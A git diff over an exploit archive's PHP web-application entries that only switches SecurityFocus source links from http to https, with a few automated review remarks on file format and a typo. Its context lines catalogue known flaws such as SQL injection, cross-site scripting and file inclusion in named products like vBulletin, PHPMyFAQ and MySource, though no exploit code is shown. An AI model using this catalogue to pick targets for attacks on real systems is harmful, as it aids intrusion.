100644 --- a/exploits/php/webapps/26279.txt +++ b/exploits/php/webapps/26279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26280.txt b/exploits/php/webapps/26280.txt index 851b42f0f..53585ff78 100644 --- a/exploits/php/webapps/26280.txt +++ b/exploits/php/webapps/26280.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26281.txt b/exploits/php/webapps/26281.txt index 906034fce..b73000222 100644 --- a/exploits/php/webapps/26281.txt +++ b/exploits/php/webapps/26281.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26282.txt b/exploits/php/webapps/26282.txt index 3adbf0031..14c8e36df 100644 --- a/exploits/php/webapps/26282.txt +++ b/exploits/php/webapps/26282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26283.txt b/exploits/php/webapps/26283.txt index 83724e52e..3d061702a 100644 --- a/exploits/php/webapps/26283.txt +++ b/exploits/php/webapps/26283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26284.txt b/exploits/php/webapps/26284.txt index b8fa40318..d37892fd2 100644 --- a/exploits/php/webapps/26284.txt +++ b/exploits/php/webapps/26284.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14876/info +source: https://www.securityfocus.com/bid/14876/info MX Shop is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26285.txt b/exploits/php/webapps/26285.txt index bcabf7a59..f338306ab 100644 --- a/exploits/php/webapps/26285.txt +++ b/exploits/php/webapps/26285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14879/info +source: https://www.securityfocus.com/bid/14879/info Hesk is prone to an authentication bypass vulnerability. diff --git a/exploits/php/webapps/26286.txt b/exploits/php/webapps/26286.txt index 9d539e9b7..f562fdddb 100644 --- a/exploits/php/webapps/26286.txt +++ b/exploits/php/webapps/26286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14883/info +source: https://www.securityfocus.com/bid/14883/info PHP Advanced Transfer Manager is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26287.txt b/exploits/php/webapps/26287.txt index bd12fe177..b172601f0 100644 --- a/exploits/php/webapps/26287.txt +++ b/exploits/php/webapps/26287.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14887/info +source: https://www.securityfocus.com/bid/14887/info PHP Advanced Transfer Manager is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26293.txt b/exploits/php/webapps/26293.txt index a08c60768..6388c0517 100644 --- a/exploits/php/webapps/26293.txt +++ b/exploits/php/webapps/26293.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14926/info +source: https://www.securityfocus.com/bid/14926/info JPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26294.txt b/exploits/php/webapps/26294.txt index 17fe36928..b93d67e61 100644 --- a/exploits/php/webapps/26294.txt +++ b/exploits/php/webapps/26294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14927/info +source: https://www.securityfocus.com/bid/14927/info phpMyFAQ is affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input before using it in a SQL query. diff --git a/exploits/php/webapps/26295.txt b/exploits/php/webapps/26295.txt index a0207e593..5fd5ffff1 100644 --- a/exploits/php/webapps/26295.txt +++ b/exploits/php/webapps/26295.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14928/info +source: https://www.securityfocus.com/bid/14928/info PHPMyFAQ is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/26296.txt b/exploits/php/webapps/26296.txt index b8d2919e4..ab86ae379 100644 --- a/exploits/php/webapps/26296.txt +++ b/exploits/php/webapps/26296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14929/info +source: https://www.securityfocus.com/bid/14929/info PHPMyFAQ is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26297.txt b/exploits/php/webapps/26297.txt index 54b100e6c..da3233b33 100644 --- a/exploits/php/webapps/26297.txt +++ b/exploits/php/webapps/26297.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14930/info +source: https://www.securityfocus.com/bid/14930/info PHPMyFAQ is prone to an unauthorized access vulnerability. A remote attacker can exploit this vulnerability to view the application log file. diff --git a/exploits/php/webapps/26298.txt b/exploits/php/webapps/26298.txt index b59c1862f..c49489a5c 100644 --- a/exploits/php/webapps/26298.txt +++ b/exploits/php/webapps/26298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14937/info +source: https://www.securityfocus.com/bid/14937/info CMS Made Simple is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26300.txt b/exploits/php/webapps/26300.txt index 5099afb1f..54b04ba85 100644 --- a/exploits/php/webapps/26300.txt +++ b/exploits/php/webapps/26300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14951/info +source: https://www.securityfocus.com/bid/14951/info lucidCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26302.txt b/exploits/php/webapps/26302.txt index 7bb171c27..5d0742ef1 100644 --- a/exploits/php/webapps/26302.txt +++ b/exploits/php/webapps/26302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14960/info +source: https://www.securityfocus.com/bid/14960/info A remote command execution vulnerability affects the application. diff --git a/exploits/php/webapps/26303.txt b/exploits/php/webapps/26303.txt index 4369c6cd3..bc98fe1fe 100644 --- a/exploits/php/webapps/26303.txt +++ b/exploits/php/webapps/26303.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14962/info +source: https://www.securityfocus.com/bid/14962/info CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26304.txt b/exploits/php/webapps/26304.txt index 635501c58..746ba6a2a 100644 --- a/exploits/php/webapps/26304.txt +++ b/exploits/php/webapps/26304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14962/info +source: https://www.securityfocus.com/bid/14962/info CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26305.txt b/exploits/php/webapps/26305.txt index 05c850f76..734aec7e5 100644 --- a/exploits/php/webapps/26305.txt +++ b/exploits/php/webapps/26305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14973/info +source: https://www.securityfocus.com/bid/14973/info SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26307.txt b/exploits/php/webapps/26307.txt index 49c079ebd..569507bc1 100644 --- a/exploits/php/webapps/26307.txt +++ b/exploits/php/webapps/26307.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14976/info +source: https://www.securityfocus.com/bid/14976/info lucidCMS is prone to to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26308.txt b/exploits/php/webapps/26308.txt index 748dc16dd..e6d64ad9a 100644 --- a/exploits/php/webapps/26308.txt +++ b/exploits/php/webapps/26308.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26309.txt b/exploits/php/webapps/26309.txt index df26b3852..814c16206 100644 --- a/exploits/php/webapps/26309.txt +++ b/exploits/php/webapps/26309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26310.txt b/exploits/php/webapps/26310.txt index 202753860..c93f90b01 100644 --- a/exploits/php/webapps/26310.txt +++ b/exploits/php/webapps/26310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26311.txt b/exploits/php/webapps/26311.txt index ba905d14f..c4ecf642a 100644 --- a/exploits/php/webapps/26311.txt +++ b/exploits/php/webapps/26311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26312.txt b/exploits/php/webapps/26312.txt index 94b5cdb37..5b99d6c3b 100644 --- a/exploits/php/webapps/26312.txt +++ b/exploits/php/webapps/26312.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14984/info +source: https://www.securityfocus.com/bid/14984/info EasyGuppy is prone to a directory traversal vulnerability. diff --git a/exploits/php/webapps/26313.txt b/exploits/php/webapps/26313.txt index 245790155..386f4ab40 100644 --- a/exploits/php/webapps/26313.txt +++ b/exploits/php/webapps/26313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14988/info +source: https://www.securityfocus.com/bid/14988/info Merak Mail Server is affected by an arbitrary file deletion vulnerability. This issue arises due to an input validation error allowing an attacker to delete files in the context of the Web server running the application. diff --git a/exploits/php/webapps/26324.txt b/exploits/php/webapps/26324.txt index 0ccf79327..679e7f8a4 100644 --- a/exploits/php/webapps/26324.txt +++ b/exploits/php/webapps/26324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15012/info +source: https://www.securityfocus.com/bid/15012/info TellMe is prone to multiple cross-site scripting vulnerabilities. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26327.txt b/exploits/php/webapps/26327.txt index 595019618..ffac0e143 100644 --- a/exploits/php/webapps/26327.txt +++ b/exploits/php/webapps/26327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15027/info +source: https://www.securityfocus.com/bid/15027/info Utopia News Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26328.txt b/exploits/php/webapps/26328.txt index 8df5cf4b9..2ba711143 100644 --- a/exploits/php/webapps/26328.txt +++ b/exploits/php/webapps/26328.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15027/info +source: https://www.securityfocus.com/bid/15027/info Utopia News Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26337.php b/exploits/php/webapps/26337.php index d9adb0033..0b51302a1 100644 --- a/exploits/php/webapps/26337.php +++ b/exploits/php/webapps/26337.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15047/info +source: https://www.securityfocus.com/bid/15047/info Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26338.txt b/exploits/php/webapps/26338.txt index 453fd9f0d..65a85ab11 100644 --- a/exploits/php/webapps/26338.txt +++ b/exploits/php/webapps/26338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15047/info +source: https://www.securityfocus.com/bid/15047/info Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26339.txt b/exploits/php/webapps/26339.txt index e5de0cbc7..2ce68481d 100644 --- a/exploits/php/webapps/26339.txt +++ b/exploits/php/webapps/26339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15047/info +source: https://www.securityfocus.com/bid/15047/info Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26343.txt b/exploits/php/webapps/26343.txt index 78e73b290..5548adc5d 100644 --- a/exploits/php/webapps/26343.txt +++ b/exploits/php/webapps/26343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15077/info +source: https://www.securityfocus.com/bid/15077/info Accelerated E Solutions is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
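Review bot: In exploits/php/webapps/26337.php the edited `source:` line is line 1 of a .php file, and it and the description lines shown as context are bare text ahead of any PHP opening tag, so a PHP interpreter treats them as literal output rather than as a header. Since the change already touches that line, consider moving the header into a comment block in a follow-up. Otherwise, state in the commit message that the scheme swap is deliberately mechanical and leaves the header format alone in script files.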
diff --git a/exploits/php/webapps/26345.txt b/exploits/php/webapps/26345.txt index 05c4a1bef..e10d5959f 100644 --- a/exploits/php/webapps/26345.txt +++ b/exploits/php/webapps/26345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15092/info +source: https://www.securityfocus.com/bid/15092/info Yapig is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26346.txt b/exploits/php/webapps/26346.txt index d88a920de..cbf69e33e 100644 --- a/exploits/php/webapps/26346.txt +++ b/exploits/php/webapps/26346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15097/info +source: https://www.securityfocus.com/bid/15097/info Accelerated Mortgage Manager is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before passing it on to SQL queries. diff --git a/exploits/php/webapps/26347.txt b/exploits/php/webapps/26347.txt index c761ecabe..2f3600f50 100644 --- a/exploits/php/webapps/26347.txt +++ b/exploits/php/webapps/26347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15108/info +source: https://www.securityfocus.com/bid/15108/info Gallery is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26348.txt b/exploits/php/webapps/26348.txt index 3ae8bb992..1b397c9fa 100644 --- a/exploits/php/webapps/26348.txt +++ b/exploits/php/webapps/26348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15111/info +source: https://www.securityfocus.com/bid/15111/info Complete PHP Counter is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
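Review bot: The context line in the exploits/php/webapps/26307.txt hunk reads "lucidCMS is prone to to an SQL injection vulnerability", with a doubled "to" that this change carries over unchanged. As the file is being modified anyway, the typo could be fixed in the same pass, or left for a separate cleanup commit so this one stays a pure URL-scheme change.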
diff --git a/exploits/php/webapps/26349.txt b/exploits/php/webapps/26349.txt index 04ac6b3ad..dc6b75035 100644 --- a/exploits/php/webapps/26349.txt +++ b/exploits/php/webapps/26349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15112/info +source: https://www.securityfocus.com/bid/15112/info Complete PHP Counter is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26350.txt b/exploits/php/webapps/26350.txt index 38e824277..e0488a48f 100644 --- a/exploits/php/webapps/26350.txt +++ b/exploits/php/webapps/26350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15114/info +source: https://www.securityfocus.com/bid/15114/info PunBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26355.txt b/exploits/php/webapps/26355.txt index 1f6848616..e47ccae38 100644 --- a/exploits/php/webapps/26355.txt +++ b/exploits/php/webapps/26355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26356.txt b/exploits/php/webapps/26356.txt index 61f91bcbd..35ef03147 100644 --- a/exploits/php/webapps/26356.txt +++ b/exploits/php/webapps/26356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/26357.txt b/exploits/php/webapps/26357.txt index 8e9cb99db..073f17c17 100644 --- a/exploits/php/webapps/26357.txt +++ b/exploits/php/webapps/26357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26358.txt b/exploits/php/webapps/26358.txt index 57a1686b8..3f84e95d0 100644 --- a/exploits/php/webapps/26358.txt +++ b/exploits/php/webapps/26358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26359.txt b/exploits/php/webapps/26359.txt index 51157e4b8..a49184481 100644 --- a/exploits/php/webapps/26359.txt +++ b/exploits/php/webapps/26359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26360.txt b/exploits/php/webapps/26360.txt index 0b932408a..7d27f02b5 100644 --- a/exploits/php/webapps/26360.txt +++ b/exploits/php/webapps/26360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26361.txt b/exploits/php/webapps/26361.txt index 981e2384c..57cbf2f39 100644 
--- a/exploits/php/webapps/26361.txt +++ b/exploits/php/webapps/26361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26362.txt b/exploits/php/webapps/26362.txt index f92fcbe60..0371d885d 100644 --- a/exploits/php/webapps/26362.txt +++ b/exploits/php/webapps/26362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26363.txt b/exploits/php/webapps/26363.txt index e7776db6c..e8abe2c51 100644 --- a/exploits/php/webapps/26363.txt +++ b/exploits/php/webapps/26363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26364.txt b/exploits/php/webapps/26364.txt index 2af569cb1..59b897dbe 100644 --- a/exploits/php/webapps/26364.txt +++ b/exploits/php/webapps/26364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26365.txt b/exploits/php/webapps/26365.txt index 674c11d28..469012e75 100644 --- a/exploits/php/webapps/26365.txt +++ b/exploits/php/webapps/26365.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26369.txt b/exploits/php/webapps/26369.txt index 85e1a897e..044b2f800 100644 --- a/exploits/php/webapps/26369.txt +++ b/exploits/php/webapps/26369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26370.txt b/exploits/php/webapps/26370.txt index 0cadd8312..1bb3c7efc 100644 --- a/exploits/php/webapps/26370.txt +++ b/exploits/php/webapps/26370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26371.txt b/exploits/php/webapps/26371.txt index bbabff46d..f68cdfb01 100644 --- a/exploits/php/webapps/26371.txt +++ b/exploits/php/webapps/26371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26372.txt b/exploits/php/webapps/26372.txt index c793081cc..b803ee9e6 100644 --- a/exploits/php/webapps/26372.txt +++ b/exploits/php/webapps/26372.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26373.txt b/exploits/php/webapps/26373.txt index b00f87b69..e26e4419a 100644 --- a/exploits/php/webapps/26373.txt +++ b/exploits/php/webapps/26373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26377.txt b/exploits/php/webapps/26377.txt index e745d0af6..afd2c06e0 100644 --- a/exploits/php/webapps/26377.txt +++ b/exploits/php/webapps/26377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15137/info +source: https://www.securityfocus.com/bid/15137/info PHPNuke Search Module is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26378.txt b/exploits/php/webapps/26378.txt index 611e8e996..289b58d94 100644 --- a/exploits/php/webapps/26378.txt +++ b/exploits/php/webapps/26378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26379.txt b/exploits/php/webapps/26379.txt index de7d35925..045ff3059 100644 --- a/exploits/php/webapps/26379.txt +++ b/exploits/php/webapps/26379.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26380.txt b/exploits/php/webapps/26380.txt index 7067bb3bb..e94c6cd56 100644 --- a/exploits/php/webapps/26380.txt +++ b/exploits/php/webapps/26380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26381.txt b/exploits/php/webapps/26381.txt index a5839041d..8663622bc 100644 --- a/exploits/php/webapps/26381.txt +++ b/exploits/php/webapps/26381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26383.txt b/exploits/php/webapps/26383.txt index a9b9cb716..3dd669de6 100644 --- a/exploits/php/webapps/26383.txt +++ b/exploits/php/webapps/26383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15168/info +source: https://www.securityfocus.com/bid/15168/info Zomplog is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26384.txt b/exploits/php/webapps/26384.txt index fb9545c1a..942457dfd 100644 --- a/exploits/php/webapps/26384.txt +++ b/exploits/php/webapps/26384.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15172/info +source: https://www.securityfocus.com/bid/15172/info FlatNuke is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26385.txt b/exploits/php/webapps/26385.txt index 013e56e08..54d146be6 100644 --- a/exploits/php/webapps/26385.txt +++ b/exploits/php/webapps/26385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15176/info +source: https://www.securityfocus.com/bid/15176/info FlatNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26386.txt b/exploits/php/webapps/26386.txt index 6986245f8..67b0f3944 100644 --- a/exploits/php/webapps/26386.txt +++ b/exploits/php/webapps/26386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26387.txt b/exploits/php/webapps/26387.txt index 3dd597abc..3045b132f 100644 --- a/exploits/php/webapps/26387.txt +++ b/exploits/php/webapps/26387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26388.txt b/exploits/php/webapps/26388.txt index 712bbb9d7..4e8dd93d7 100644 --- a/exploits/php/webapps/26388.txt +++ b/exploits/php/webapps/26388.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26389.pl b/exploits/php/webapps/26389.pl index 86433f8b8..ff1d231ac 100755 --- a/exploits/php/webapps/26389.pl +++ b/exploits/php/webapps/26389.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15181/info +source: https://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26390.txt b/exploits/php/webapps/26390.txt index 02f12f011..6b453a29b 100644 --- a/exploits/php/webapps/26390.txt +++ b/exploits/php/webapps/26390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15185/info +source: https://www.securityfocus.com/bid/15185/info saphp Lesson is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26391.html b/exploits/php/webapps/26391.html index 44a4b3d32..815c345f0 100644 --- a/exploits/php/webapps/26391.html +++ b/exploits/php/webapps/26391.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15186/info +source: https://www.securityfocus.com/bid/15186/info Domain Manager Pro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26392.txt b/exploits/php/webapps/26392.txt index 61c3cb176..422168e99 100644 --- a/exploits/php/webapps/26392.txt +++ b/exploits/php/webapps/26392.txt 
